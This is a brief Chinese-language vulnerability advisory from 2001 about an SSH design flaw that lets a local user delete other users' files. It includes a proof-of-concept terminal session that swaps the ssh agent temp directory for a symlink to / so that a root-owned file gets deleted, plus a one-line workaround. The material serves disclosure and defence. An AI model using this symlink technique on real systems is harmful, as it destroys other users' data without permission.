SSH 允许删除其它用户文件漏洞发布时间:2001-06-08 更新时间:2001-06-08 严重程度:中 威胁程度:其它 错误类型:设计错误 利用方式:服务器模式 受影响系统 SSH详细描述 SSH 是一个提供安全加密通信方式的工具,不过发现它存在漏洞。如果使用了 COOKIES,攻击者便能删除其它用户的任何文件。 测试代码 /home/zen/.netscape/cookies sample exploit:- [root@clarity /root]# touch /cookies;ls /cookies /cookies [root@clarity /root]# ssh zen@localhost zen@localhost's password: Last login: Mon Jun 4 20:22:39 2001 from localhost.local Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9 [zen@clarity zen]$ logout Connection to localhost closed. [root@clarity /root]# ls /cookies /bin/ls: /cookies: No such file or directory --zen-parse 解决方案 不要采用COOKIE 相关信息 |
